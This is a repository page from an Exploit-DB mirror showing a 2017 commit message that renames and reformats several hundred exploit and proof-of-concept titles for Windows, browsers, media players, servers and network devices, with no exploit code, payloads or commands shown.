bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/remote/37536.rb
Offensive Security 0320cba051 DB: 2017-04-02 
6 new exploits

Microsoft Internet Explorer 11 - Crash PoC (1)
Microsoft Internet Explorer 11 - Crash (PoC) (1)

Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)
Microsoft Windows SQL Server - Remote  Denial of Service (MS03-031)

Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)

Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)
Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1)
Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)

Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)

Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)

Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)

Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)
Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)

Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)
Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)

Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002)
Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)

BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs
BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs)

Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service
Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service

freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)

Microsoft Internet Explorer GDI+ - PoC (MS08-052)
Microsoft Internet Explorer GDI+ - (PoC) (MS08-052)

Microsoft Windows - GDI+ PoC (MS08-052) (2)
Microsoft Windows - GDI+ (PoC) (MS08-052) (2)
Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service
Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service

Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)
Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (New Heap Spray)

Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)
Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)

eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)
eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)

Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH)
Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)

Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)
Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)

Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)
Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)

Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014)
Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)

DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow PoCs
DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs)

AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH)
AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)

MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC
MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)

otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs
otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs)

JetAudio 7.5.3 COWON Media Center - '.wav' Crash
Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)
Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)
Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC)  (SEH)
Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)

Tuniac 090517c - '.m3u' Local File Crash (PoC)

HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)
HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)

BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2)
BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)

Eureka Email Client 2.2q - PoC Buffer Overflow
Eureka Email Client 2.2q - Buffer Overflow (PoC)

Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash
Microsoft Windows 7 / 2008 R2 - Remote Kernel Crash

Picpuz 2.1.1 - Buffer Overflow Denial of Service/PoC
Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)

Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones
Total MultiMedia Features -  Sony Ericsson Phones Denial of Service (PoC)

Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service
Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service

iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC
iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC)

RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC
RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)

Free MP3 CD Ripper 2.6 - '.wav' PoC
Free MP3 CD Ripper 2.6 - '.wav' (PoC)

Anyzip 1.1 - '.zip' PoC (SEH)
Anyzip 1.1 - '.zip' (PoC) (SEH)

Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)

Webby WebServer - PoC SEH control
Webby WebServer - SEH Control (PoC)

FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05)
FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off- By One (PoC)

Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free
Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free

AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)
AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)

Mozilla Firefox - Memory Corruption PoC (Simplified)
Mozilla Firefox - (Simplified) Memory Corruption (PoC)

Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098)
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)

Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)
Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH)

Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)
Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)

Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit
Real player 14.0.2.633 - Buffer Overflow / Denial of Service
IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service

Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service
Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service

D-Link DSL-2650U - Denial of Service/PoC
D-Link DSL-2650U - Denial of Service (PoC)

Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077)
Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)

Opera 11.52 - PoC Denial of Service
Opera 11.52 - Denial of Service (PoC)

Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)
Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)

Microsoft Windows - 'afd.sys' PoC (MS11-046)
Microsoft Windows - 'afd.sys' (PoC) (MS11-046)

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)

Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)
Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit)

Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service
Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service

Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)
Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)

Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service
Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)
Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)
Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)
Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)

Microsoft PoCket Internet Explorer 3.0 - Denial of Service
Microsoft Pocket Internet Explorer 3.0 - Denial of Service

Microsoft Windows - HWND_BROADCAST PoC (MS13-005)
Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)

Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC
Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)

Apple Safari 3 for Windows - Document.Location Denial of Service
Apple Safari 3 for Windows - 'Document.Location' Denial of Service

PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)
PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service

Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow
Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow

Android Web Browser - GIF File Heap Based Buffer Overflow
Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow

Android Web Browser - BMP File Integer Overflow
Google Android Web Browser - '.BMP' File Integer Overflow

Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)
Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)

Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service

Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)
Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035)

Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)

Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)
Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)

UniPDF 1.1 - Crash (PoC) (SEH)

Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)

Microsoft Windows - 'HTTP.sys' PoC (MS15-034)
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)

UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)

Microsoft Internet Explorer 11 - Crash PoC (2)
Microsoft Internet Explorer 11 - Crash (PoC) (2)

Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow
Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow

QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash
QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
Microsoft Windows - NtClose DeadLock PoC (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)
Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030)

PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow
PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow

Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation
Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation

Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)
Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH)

Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)
Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)

Tuniac 090517c - '.m3u' Local File Crash (PoC)

Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1)
Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)

Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)

Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)
Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit)

Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)

Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)
Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)

Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)
Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)

Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2)

Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)

Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)

Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit)
Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)

PHP 5.3.6 - Buffer Overflow PoC (ROP)
PHP 5.3.6 - Buffer Overflow (ROP) (PoC)

Microsoft Windows Server 2000/NT 4 - DLL Search Path
Microsoft Windows NT 4/2000 - DLL Search Path

Microsoft Windows Server 2000/NT 4 - NTFS File Hiding
Microsoft Windows NT 4/2000 - NTFS File Hiding

Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation
Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)
Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)
Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)

Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)
Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)
Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation

Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)

Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation
Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation

Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)
Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)

UniPDF 1.1 - Crash PoC (SEH overwritten)

Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)

UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)

Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)
Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)

Android - get_user/put_user Exploit (Metasploit)
Google Android - get_user/put_user Exploit (Metasploit)

Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)

Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)

Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2)
Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)
Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)

MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)

MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)

ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution
ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1)

Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)
Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1)
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)
Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2)
Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)

Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow
Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow

Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)

ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution
ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)

Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)

CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)

ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow
ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow

IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow

Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)
Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)

Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)

Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2)
Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)

Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal
Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal

JetAudio 7.5.3 COWON Media Center - '.wav' Crash

DistCC Daemon - Command Execution (Metasploit) (1)
DistCC Daemon - Command Execution (Metasploit)
Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)
mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)
Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)
mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)

Veritas NetBackup - Remote Command Execution (Metasploit) (1)
Veritas NetBackup - Remote Command Execution (Metasploit)

Pegasus Mail Client 4.51 - PoC Buffer Overflow
Pegasus Mail Client 4.51 - Buffer Overflow (PoC)

Irix LPD tagprinter - Command Execution (Metasploit) (1)
Irix LPD tagprinter - Command Execution (Metasploit)

Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (1)
Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit)

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)

Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account
Tandberg E & EX & C Series Endpoints - Default Root Account Credentials

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)

Veritas NetBackup - Remote Command Execution (Metasploit) (2)

Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)

MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2)

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)

CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)

httpdx - tolog() Function Format String (Metasploit) (1)
httpdx - 'tolog()' Function Format String (Metasploit) (1)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)

httpdx - tolog() Function Format String (Metasploit) (2)
httpdx - 'tolog()' Function Format String (Metasploit) (2)

Irix LPD tagprinter - Command Execution (Metasploit) (2)

Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)

DistCC Daemon - Command Execution (Metasploit) (2)
HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)
HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)
Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)

Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)
Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)
Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)

HP SiteScope - Remote Code Execution (Metasploit) (1)
HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit)

Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow
Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow

Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow
Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow

thttpd 2.2x - defang Remote Buffer Overflow
thttpd 2.2x - 'defang' Remote Buffer Overflow

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)
Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)

Dovecot with Exim - sender_address Parameter Remote Command Execution
Dovecot with Exim - 'sender_address' Parameter Remote Command Execution

HP SiteScope - Remote Code Execution (Metasploit) (2)
HP SiteScope (Windows) - Remote Code Execution (Metasploit)

Western Digital Arkeia - Remote Code Execution (Metasploit) (1)
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)

Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)

Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1)
